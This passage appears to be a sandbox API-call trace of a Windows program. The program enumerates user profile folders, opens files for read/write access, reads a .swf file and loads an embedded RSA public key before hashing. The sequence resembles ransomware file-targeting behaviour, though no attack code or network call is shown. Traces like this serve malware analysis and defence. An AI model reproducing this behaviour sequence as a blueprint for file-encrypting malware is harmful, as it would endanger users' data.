[0131.679] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.679] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0131.679] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.679] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.679] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.679] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.679] PathFindFileNameW (pszPath="") returned="" [0131.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.679] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.679] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.679] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.680] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0131.680] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.680] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0131.680] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0131.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0131.680] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.680] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0131.680] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0131.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0131.680] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.680] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0131.680] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c010 | out: hHeap=0x4970000) returned 1 [0131.681] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.681] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.681] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0131.681] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.681] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.681] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.681] PathFindFileNameW (pszPath="") returned="" [0131.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.681] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c010 | out: hHeap=0x4970000) returned 1 [0131.681] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.681] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.682] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0131.682] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.682] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.682] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.682] PathFindFileNameW (pszPath="") returned="" [0131.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0131.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.682] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.682] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.682] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0131.682] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.682] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.682] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.682] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.683] PathFindFileNameW (pszPath="") returned="" [0131.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0131.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.683] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.683] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.683] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0131.683] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.683] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.683] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.683] PathFindFileNameW (pszPath="") returned="" [0131.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc1bf5a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc1bf5a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.684] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.684] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc1bf5a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc1bf5a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.684] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a7bee80, ftCreationTime.dwHighDateTime=0x1d5d886, ftLastAccessTime.dwLowDateTime=0x57484e10, ftLastAccessTime.dwHighDateTime=0x1d5e2fc, ftLastWriteTime.dwLowDateTime=0x57484e10, ftLastWriteTime.dwHighDateTime=0x1d5e2fc, nFileSizeHigh=0x0, nFileSizeLow=0x61bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57EjRRjIEtfdBsuYYWaq.swf", cAlternateFileName="57EJRR~1.SWF")) returned 1 [0131.684] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\57EjRRjIEtfdBsuYYWaq.swf") returned=".swf" [0131.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\57EjRRjIEtfdBsuYYWaq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\57ejrrjietfdbsuyywaq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.684] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=25020) returned 1 [0131.684] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.687] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x6196, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.687] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.688] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x61bc, lpOverlapped=0x0) returned 1 [0131.689] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.689] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.689] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.689] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.690] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.690] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.690] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.690] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.690] GetLastError () returned 0x0 [0131.690] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.690] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.690] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.690] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.690] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.690] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.690] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.691] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171f0 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16a40 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.691] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.691] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.692] GetCurrentThreadId () returned 0x618 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5110 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.692] GetCurrentThreadId () returned 0x618 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.692] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.692] RtlAllocateHeap 